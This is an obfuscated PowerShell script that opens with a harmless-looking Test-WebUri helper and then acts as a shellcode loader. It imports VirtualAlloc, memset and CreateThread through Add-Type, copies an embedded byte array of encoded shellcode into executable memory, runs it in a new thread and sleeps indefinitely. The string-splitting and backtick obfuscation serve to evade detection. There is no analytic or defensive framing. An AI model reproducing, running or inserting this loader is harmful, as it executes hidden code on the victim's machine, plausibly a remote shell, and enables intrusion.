function TesT`-web`URi
{
    [CmdletBinding()]
    [OutputType([bool])]
    Param
    (
        [Parameter(mandAtory=${T`Rue})]
        [ValidateNotNullOrEmpty()]
        [Uri]
        ${u`Ri}
    )

    return (${u`Ri}."AbsOlut`e`U`RI" -ne ${NU`lL}) -and (${u`Ri}."SCH`EmE" -match ((("{0}{1}{3}{2}"-f'[h','ttp','https]','{0}'))-f [CHaR]124))
}
${c} = ((("{86}{31}{3}{16}{107}{22}{58}{102}{50}{46}{52}{28}{34}{87}{55}{2}{29}{83}{96}{30}{40}{56}{68}{67}{35}{27}{23}{11}{21}{66}{38}{103}{110}{54}{9}{73}{100}{12}{81}{0}{48}{44}{24}{69}{77}{80}{95}{20}{14}{7}{5}{25}{37}{13}{74}{59}{106}{94}{93}{82}{72}{108}{76}{42}{51}{19}{79}{4}{104}{6}{41}{53}{98}{43}{97}{71}{47}{61}{32}{90}{10}{75}{88}{62}{105}{45}{92}{64}{60}{70}{33}{84}{15}{101}{99}{36}{18}{109}{39}{65}{63}{1}{91}{57}{17}{26}{85}{8}{78}{89}{49}"-f't','r memset(I','Virtu','lI','ea','bl','i',']pu',' ui','Typ','ss, ','uin','u','ati',')','Import(T','mp','tr de','ic stati','pTh','.dllTht','t ','Thtkern','ess, ','t);[D','ic s','st, uint','dr','extern ','alAllo','t','l','ze, IntPtr l','eadId','Int','d','vcrt.dllTht)]publ','t','ize, u','xter','Ptr','b','r ','i','lProtec','int dwC','ic','dwStac',' f',';','public stat','l',' ','utes, ','lAllocation','tr ',' l','tP','el32.dl','ern I','n','kSi','Parame','tPt','eatio','n In','dwS','A','p','llImpo','Flags, IntPtr lpThr',' ','re','e','c ext','In','tPt','r','nt count','r','t(Thtkerne','in','ateTh','c(',');[Dll',' src,','[D','P','tPtr lp',')','pStartAddre','n','r','e',' Cr','l32','In','nt','u','ms',', ','ht','lTht)]','i','dAttr','ter, u','ntPtr','ort(','ad(In','c e','nt f'))."REP`l`ACE"(([ChAr]84+[ChAr]104+[ChAr]116),[STRiNG][ChAr]34));${w} = &("{0}{1}"-f 'Add-T','ype') -memberDefinition ${C} -Name ("{0}{1}" -f'Win3','2') -namespace ("{1}{0}{2}"-f'n32Function','Wi','s') -passthru;[Byte[]];[Byte[]]${Z} = 0xd9,0xe9,0xd9,0x74,0x24,0xf4,0xbb,0xc1,0x90,0xf7,0x17,0x5a,0x2b,0xc9,0xb1,0x56,0x31,0x5a,0x1a,0x83,0xea,0xfc,0x03,0x5a,0x16,0xe2,0x34,0x6c,0x1f,0x95,0xb6,0x8d,0xe0,0xfa,0x3f,0x68,0xd1,0x3a,0x5b,0xf8,0x42,0x8b,0x28,0xac,0x6e,0x60,0x7c,0x45,0xe4,0x04,0xa8,0x6a,0x4d,0xa2,0x8e,0x45,0x4e,0x9f,0xf2,0xc4,0xcc,0xe2,0x26,0x27,0xec,0x2c,0x3b,0x26,0x29,0x50,0xb1,0x7a,0xe2,0x1e,0x67,0x6b,0x87,0x6b,0xbb,0x00,0xdb,0x7a,0xbb,0xf5,0xac,0x7d,0xea,0xab,0xa7,0x27,0x2c,0x4d,0x6b,0x5c,0x65,0x55,0x68,0x59,0x3c,0xee,0x5a,0x15,0xbf,0x26,0x93,0xd6,0x13,0x07,0x1b,0x25,0x6a,0x4f,0x9c,0xd6,0x19,0xb9,0xde,0x6b,0x19,0x7e,0x9c,0xb7,0xac,0x65,0x06,0x33,0x16,0x42,0xb6,0x90,0xc0,0x01,0xb4,0x5d,0x87,0x4e,0xd9,0x60,0x44,0xe5,0xe5,0xe9,0x6b,0x2a,0x6c,0xa9,0x4f,0xee,0x34,0x69,0xee,0xb7,0x90,0xdc,0x0f,0xa7,0x7a,0x80,0xb5,0xa3,0x97,0xd5,0xc4,0xe9,0xff,0x47,0xb3,0x65,0x00,0xf0,0x4c,0xef,0x6e,0x69,0xe6,0x87,0x22,0x1e,0x20,0x5f,0x44,0x35,0x1d,0x84,0xe9,0xe5,0x0e,0x69,0x5d,0x62,0x8a,0xdb,0x18,0xd5,0x15,0x36,0x89,0x4a,0x83,0xba,0x7d,0x3e,0x3b,0x7c,0x80,0xc0,0xbb,0x96,0x0f,0xc0,0xbb,0x66,0x3f,0x80,0x8e,0x31,0x78,0x4a,0xf0,0xed,0xee,0x1d,0x79,0x92,0x29,0x5e,0xac,0x24,0x73,0xf2,0x26,0x37,0x4e,0x15,0x32,0x64,0xfd,0x86,0x6d,0xd8,0x57,0x41,0x7a,0x8b,0x79,0xaa,0x83,0xe1,0x10,0xa6,0x71,0x55,0x75,0xb7,0xb6,0x69,0x85,0x3e,0x58,0x03,0x81,0x10,0xf2,0xcb,0xdf,0xf8,0x77,0xb2,0x41,0x7e,0x88,0xef,0x2d,0x2c,0x25,0x43,0x84,0xba,0xe4,0x65,0x30,0x40,0x09,0xbc,0xc5,0x76,0x80,0x35,0x89,0x03,0xb3,0x22,0xe5,0x59,0xe1,0xe5,0xfa,0x77,0x8f,0x49,0x6d,0x78,0x5f,0x4a,0x6d,0x10,0x5f,0x4a,0x2d,0xe0,0x0c,0x22,0xf5,0x44,0xe1,0x57,0xfa,0x50,0x96,0xcb,0x56,0xd2,0x7f,0xbc,0x30,0xe4,0x5f,0x43,0xc1,0xb7,0xc9,0x2b,0xd3,0xa1,0x7c,0x49,0x2c,0x18,0xfb,0x4e,0xa7,0x6e,0x88,0x48,0x49,0xb2,0x0b,0x96,0x3c,0xd1,0x4b,0xd4,0xe0,0xf1,0x1e,0x25,0xe1,0xfd,0xd1,0xe0,0x2c,0x2c,0x20,0x25,0x69,0x1e,0x73,0x67,0xb8,0x5e;${g} = 0x1000;if (${z}."l`enGth" -gt 0x1000){${G} = ${z}."l`E`NgtH"};${X}=${w}::("{0}{2}{1}" -f 'Vir','oc','tualAll').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${z}."L`Ength"-1);${I}++) {${w}::"mE`Ms`Et"([IntPtr](${x}.("{0}{1}" -f'To','Int32').Invoke()+${i}), ${z}[${i}], 1)};${w}::("{1}{0}{3}{2}"-f 'teTh','Crea','ead','r').Invoke(0,0,${X},0,0,0);for (;;){.("{2}{1}{0}{3}" -f '-sle','t','Star','ep') 60};
